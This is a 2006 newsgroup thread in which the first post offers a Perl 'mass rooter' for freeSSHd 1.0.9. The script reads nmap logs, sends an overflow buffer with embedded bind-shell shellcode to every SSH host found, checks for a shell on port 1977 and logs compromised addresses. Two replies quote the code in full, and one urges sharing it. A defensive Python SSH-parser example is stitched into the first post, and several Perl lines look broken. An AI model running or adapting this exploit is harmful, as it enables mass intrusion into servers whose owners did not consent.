Computer Security - freesshd 1.0.9 massr00ter

 
Old 06-17-2006, 12:02 AM   #1
freesshd 1.0.9 massr00ter


Here is a freeSSHd mass-rooter; it will check and hack hosts
from the nmap port scan logs. Have fun with
this tool:

#!/usr/bin/perl

use Socket;
use IO::Socket::INET;

my $port = '22';
my @banner = (22);
my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n".
"+ +\n".
"+ freeSSHd 1.0.9 Mass r00ter +\n".
"+ +\n".
"+ Author: cyberstorm +\n".
"+ Contact: cyberstorm187[at]arcor.de +\n".
"+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
"+ +\n".
"+++++++++++++++++++++++++++++++++++++++++++++\n";

my $shellcode =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0".
"\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff".
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff".
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ xd0\x66\x6a\x64".
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab".
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51".
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6".
"\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0";

print "$info";
&usage if !@ARGV; &main;


sub main {
while (<>) {
if (/^Interesting ports on.*\((\S+)\):/) {
$ip = $1; $i++;
} foreach $port (@banner) {
if (/^$port\/(\w+)\s+open/) {
$proto = $1; $p++;
&banner($ip, $port, $proto);
}
}
} &stats;
}

sub banner {
my ($ip, $port, $proto) = @_;
print "$ip:$port\t=> ";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
connect(SOCK, sockaddr_in($port, inet_aton($ip)));
if ($port != 80) {
$banner =<SOCK>;
close(SOCK);
print "$banner";
} else {
send(SOCK, "GET / HTTP/1.0\n\n", 0);
@o = <SOCK>;
close(SOCK);
foreach (@o) {
if (/Server:\s(.*)/) {
$banner = $1;
print "$banner";
}
}
}
if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
&exploit($ip,$port,$proto);
}
}

sub exploit {
my ($ip,$port,$proto) = @_;
if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
my $buff =
"\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48".
"\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde";

my $buff = $buff + "A" * 1055;
my $buff = $buff + $eip;
my $buff = $buff + "yyyy";
my $buff = $buff + "\x90" * 4;
my $buff = $buff + $shellcode;
my $buff = $buff + "B" * 19021 + "\r\n";

print "[~] Try to connect to $ip\n";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
connect(SOCK, sockaddr_in($port, inet_aton($ip)));
print "[~] Creating Buffer\n";
send(SOCK, $buff, 0);
close(SOCK);
print "[~] Send Buffer\n";
print "[~] checking ...\n";

sleep(1);
if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
print "[~] YoU got an Shell\n".
"Connect over Telnet on Port 1977\n";
open(OUTPUT, '>>freesshd.txt');
print OUTPUT "$ip\n";
close(OUTPUT);
} else {
print "Sorry, Dude !\n";
}
}
}

sub usage {
print "freesshd.pl <infile>\n";
}



cyberstorm
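The payload in the post above begins with an SSH identification line ("SSH-1.99-OpenSSH_3.4") followed by a binary packet whose message type byte is SSH_MSG_KEXINIT (20) and whose length fields are far larger than the data a server would normally expect. The defensive counterpart is a parser that checks every declared length against the bytes actually received before it copies anything. The Python below is an added example written for this page, not code from the thread or from the freeSSHd project; it makes no claim about freeSSHd's internals, and the packets it checks are constructed samples rather than captured traffic. The bounds it enforces come from RFC 4253 (identification line at most 255 bytes including CR LF; total packet size up to 35000 bytes), and the name-list parsing follows the KEXINIT layout in that RFC.

```python
import struct

SSH_MSG_KEXINIT = 20
MAX_PACKET_TOTAL = 35000   # RFC 4253 section 6.1: upper bound on total packet size
MAX_IDENT_LINE = 255       # RFC 4253 section 4.2: identification line incl. CR LF
KEXINIT_NAME_LISTS = ("kex", "host_key", "enc_c2s", "enc_s2c", "mac_c2s",
                      "mac_s2c", "comp_c2s", "comp_s2c", "lang_c2s", "lang_s2c")


class SshParseError(ValueError):
    """Raised for any input a hardened server-side parser should reject."""


def read_identification(data):
    """Split off the client identification line, enforcing the 255-byte bound."""
    end = data.find(b"\n")
    if end == -1 or end + 1 > MAX_IDENT_LINE:
        raise SshParseError("identification line missing or longer than 255 bytes")
    line = data[:end + 1]
    if not line.startswith(b"SSH-") or not line.isascii():
        raise SshParseError("identification line is not a valid SSH- string")
    return line.rstrip(b"\r\n").decode("ascii"), data[end + 1:]


def read_string(buf, off):
    """Read one SSH 'string' (uint32 length + bytes); the declared length is
    checked against the bytes present before any of them are touched."""
    if off + 4 > len(buf):
        raise SshParseError("truncated length field at offset %d" % off)
    n = struct.unpack_from(">I", buf, off)[0]
    remaining = len(buf) - off - 4
    if n > remaining:
        raise SshParseError("declared length %d exceeds %d remaining bytes" % (n, remaining))
    return buf[off + 4:off + 4 + n], off + 4 + n


def parse_kexinit(packet):
    """Validate binary-packet framing and parse a KEXINIT payload into its name-lists."""
    if len(packet) < 5:
        raise SshParseError("truncated packet header")
    packet_length, padding_length = struct.unpack_from(">IB", packet, 0)
    if packet_length + 4 > MAX_PACKET_TOTAL:
        raise SshParseError("packet_length %d above the 35000-byte limit" % packet_length)
    if packet_length + 4 > len(packet):
        raise SshParseError("packet_length %d exceeds bytes received" % packet_length)
    if padding_length < 4 or padding_length + 1 > packet_length:
        raise SshParseError("invalid padding_length %d" % padding_length)
    payload = packet[5:4 + packet_length - padding_length]
    if len(payload) < 17 or payload[0] != SSH_MSG_KEXINIT:
        raise SshParseError("first packet is not a KEXINIT")
    off = 17  # message type byte + 16-byte cookie
    lists = {}
    for name in KEXINIT_NAME_LISTS:
        raw, off = read_string(payload, off)
        if any(c <= 32 or c >= 127 for c in raw):  # names are printable US-ASCII
            raise SshParseError("%s name-list contains non-printable bytes" % name)
        lists[name] = [n.decode("ascii") for n in raw.split(b",")] if raw else []
    if off + 5 != len(payload):  # boolean first_kex_packet_follows + uint32 reserved
        raise SshParseError("KEXINIT payload has trailing or missing bytes")
    return lists


def check_client_hello(data):
    """Return 'ok' or the reason a hardened server would drop the connection."""
    try:
        _ident, rest = read_identification(data)
        parse_kexinit(rest)
        return "ok"
    except SshParseError as exc:
        return "reject: %s" % exc


def build_kexinit(lists, ident=b"SSH-2.0-ExampleClient_1.0\r\n"):
    """Construct a well-formed client hello (sample data, not captured traffic)."""
    payload = bytes([SSH_MSG_KEXINIT]) + b"\x00" * 16
    for name in KEXINIT_NAME_LISTS:
        raw = ",".join(lists.get(name, [])).encode("ascii")
        payload += struct.pack(">I", len(raw)) + raw
    payload += b"\x00" + b"\x00\x00\x00\x00"
    padding_length = 8 - (len(payload) + 5) % 8  # pad to the 8-byte block, min 4
    if padding_length < 4:
        padding_length += 8
    packet_length = 1 + len(payload) + padding_length
    return ident + struct.pack(">IB", packet_length, padding_length) + payload + b"\x00" * padding_length


def forge_oversized_name_list(hello):
    """Constructed negative sample: same framing, but the first name-list
    declares a length far beyond the bytes that follow it."""
    off = hello.find(b"\n") + 1 + 5 + 17
    return hello[:off] + struct.pack(">I", 0x7FFF0000) + hello[off + 4:]


SAMPLE_GOOD = build_kexinit({"kex": ["curve25519-sha256", "diffie-hellman-group14-sha256"],
                             "host_key": ["ssh-ed25519"],
                             "enc_c2s": ["aes256-gcm@openssh.com"], "enc_s2c": ["aes256-gcm@openssh.com"],
                             "mac_c2s": ["hmac-sha2-256"], "mac_s2c": ["hmac-sha2-256"],
                             "comp_c2s": ["none"], "comp_s2c": ["none"]})
SAMPLE_BAD_LIST = forge_oversized_name_list(SAMPLE_GOOD)
SAMPLE_BAD_IDENT = b"SSH-2.0-" + b"A" * 300 + b"\r\n"  # constructed: ident line over 255 bytes

if __name__ == "__main__":
    for label, sample in (("good", SAMPLE_GOOD), ("bad list", SAMPLE_BAD_LIST), ("bad ident", SAMPLE_BAD_IDENT)):
        print("%-10s %s" % (label, check_client_hello(sample)))
```

The point of the example is the order of operations in read_string and parse_kexinit: every length is compared with what has actually arrived before a single byte is copied, so an oversized length field is rejected instead of driving a copy past the end of a fixed buffer. On the detection side, a connection whose identification line or first packet fails these checks is worth logging with the peer address and the declared length.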
Old 06-17-2006, 08:01 AM   #2
Geordie Guy
 
Re: freesshd 1.0.9 massr00ter
cyberstorm wrote:
> Here is an freesshd massrooter it will be check and hack
> from the nmap portscan logs. Have Fun with
> this tool:
>
> #!/usr/bin/perl
>
> use Socket;
> use IO::Socket::INET;
>
> my $port = '22';
> my @banner = (22);
> my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n".
> "+ +\n".
> "+ freeSSHd 1.0.9 Mass r00ter +\n".
> "+ +\n".
> "+ Author: cyberstorm +\n".
> "+ Contact: cyberstorm187[at]arcor.de +\n".
> "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
> "+ +\n".
> "+++++++++++++++++++++++++++++++++++++++++++++\n";
>
> my $shellcode =
> "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45".
> "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49".
> "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d".
> "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66".
> "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61".
> "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40".
> "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32".
> "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6".
> "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09".
> "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0".
> "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff".
> "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53".
> "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff".
> "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ xd0\x66\x6a\x64".
> "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89".
> "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab".
> "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51".
> "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53".
> "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6".
> "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0";
>
> print "$info";
> &usage if !@ARGV; &main;
>
>
> sub main {
> while (<>) {
> if (/^Interesting ports on.*\((\S+)\):/) {
> $ip = $1; $i++;
> } foreach $port (@banner) {
> if (/^$port\/(\w+)\s+open/) {
> $proto = $1; $p++;
> &banner($ip, $port, $proto);
> }
> }
> } &stats;
> }
>
> sub banner {
> my ($ip, $port, $proto) = @_;
> print "$ip:$port\t=> ";
> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
> if ($port != 80) {
> $banner =<SOCK>;
> close(SOCK);
> print "$banner";
> } else {
> send(SOCK, "GET / HTTP/1.0\n\n", 0);
> @o = <SOCK>;
> close(SOCK);
> foreach (@o) {
> if (/Server:\s(.*)/) {
> $banner = $1;
> print "$banner";
> }
> }
> }
> if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
> &exploit($ip,$port,$proto);
> }
> }
>
> sub exploit {
> my ($ip,$port,$proto) = @_;
> if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
> my $buff =
> "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48".
> "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00".
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde";
>
> my $buff = $buff + "A" * 1055;
> my $buff = $buff + $eip;
> my $buff = $buff + "yyyy";
> my $buff = $buff + "\x90" * 4;
> my $buff = $buff + $shellcode;
> my $buff = $buff + "B" * 19021 + "\r\n";
>
> print "[~] Try to connect to $ip\n";
> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
> print "[~] Creating Buffer\n";
> send(SOCK, $buff, 0);
> close(SOCK);
> print "[~] Send Buffer\n";
> print "[~] checking ...\n";
>
> sleep(1);
> if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
> print "[~] YoU got an Shell\n".
> "Connect over Telnet on Port 1977\n";
> open(OUTPUT, '>>freesshd.txt');
> print OUTPUT "$ip\n";
> close(OUTPUT);
> } else {
> print "Sorry, Dude !\n";
> }
> }
> }
>
> sub usage {
> print "freesshd.pl <infile>\n";
> }
>

Keep it PRIVATE PRIVATE!!!
By posting it to a news group LOL


Geordie Guy
Old 06-18-2006, 09:13 AM   #3
imhotep
 
Re: freesshd 1.0.9 massr00ter
Geordie Guy wrote:

> cyberstorm wrote:
>> Here is an freesshd massrooter it will be check and hack
>> from the nmap portscan logs. Have Fun with
>> this tool:
>>
>> #!/usr/bin/perl
>>
>> use Socket;
>> use IO::Socket::INET;
>>
>> my $port = '22';
>> my @banner = (22);
>> my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n".
>> "+ +\n".
>> "+ freeSSHd 1.0.9 Mass r00ter +\n".
>> "+ +\n".
>> "+ Author: cyberstorm +\n".
>> "+ Contact: cyberstorm187[at]arcor.de +\n".
>> "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
>> "+ +\n".
>> "+++++++++++++++++++++++++++++++++++++++++++++\n";
>>
>> my $shellcode =
>> "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\ x24\x24\x8b\x45".
>> "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\ x20\x01\xeb\x49".
>> "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\ x07\xc1\xca\x0d".
>> "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\ x24\x01\xeb\x66".
>> "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\ x6c\x24\x1c\x61".
>> "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\ x1c\xad\x8b\x40".
>> "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\ x66\x68\x33\x32".
>> "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\ x3b\x50\xff\xd6".
>> "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\ xd0\x68\xd9\x09".
>> "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\ x43\x53\xff\xd0".
>> "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\ x70\xc7\x57\xff".
>> "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\ x57\xff\xd6\x53".
>> "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\ x54\x54\x55\xff".
>> "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\ xd0\x66\x6a\x64".
>> "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89".
>> "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab".
>> "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51".
>> "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53".
>> "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6".
>> "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0";
>>
>> print "$info";
>> &usage if !@ARGV; &main;
>>
>>
>> sub main {
>> while (<>) {
>> if (/^Interesting ports on.*\((\S+)\):/) {
>> $ip = $1; $i++;
>> } foreach $port (@banner) {
>> if (/^$port\/(\w+)\s+open/) {
>> $proto = $1; $p++;
>> &banner($ip, $port, $proto);
>> }
>> }
>> } &stats;
>> }
>>
>> sub banner {
>> my ($ip, $port, $proto) = @_;
>> print "$ip:$port\t=> ";
>> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
>> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
>> if ($port != 80) {
>> $banner =<SOCK>;
>> close(SOCK);
>> print "$banner";
>> } else {
>> send(SOCK, "GET / HTTP/1.0\n\n", 0);
>> @o = <SOCK>;
>> close(SOCK);
>> foreach (@o) {
>> if (/Server:\s(.*)/) {
>> $banner = $1;
>> print "$banner";
>> }
>> }
>> }
>> if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
>> &exploit($ip,$port,$proto);
>> }
>> }
>>
>> sub exploit {
>> my ($ip,$port,$proto) = @_;
>> if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
>> my $buff =
>> "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48".
>> "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00".
>> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde";
>>
>> my $buff = $buff + "A" * 1055;
>> my $buff = $buff + $eip;
>> my $buff = $buff + "yyyy";
>> my $buff = $buff + "\x90" * 4;
>> my $buff = $buff + $shellcode;
>> my $buff = $buff + "B" * 19021 + "\r\n";
>>
>> print "[~] Try to connect to $ip\n";
>> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
>> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
>> print "[~] Creating Buffer\n";
>> send(SOCK, $buff, 0);
>> close(SOCK);
>> print "[~] Send Buffer\n";
>> print "[~] checking ...\n";
>>
>> sleep(1);
>> if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
>> print "[~] YoU got an Shell\n".
>> "Connect over Telnet on Port 1977\n";
>> open(OUTPUT, '>>freesshd.txt');
>> print OUTPUT "$ip\n";
>> close(OUTPUT);
>> } else {
>> print "Sorry, Dude !\n";
>> }
>> }
>> }
>>
>> sub usage {
>> print "freesshd.pl <infile>\n";
>> }
>>

> Keep it PRIVATE PRIVATE!!!
> By posting it to a news group LOL



No, share, share, share!!!

Im
--
*************************************
Pass a Net Neutrality Law in the US!!!!

Save the Internet:
http://www.savetheinternet.com/

Its our net:
http://www.itsournet.org/

*************************************


imhotep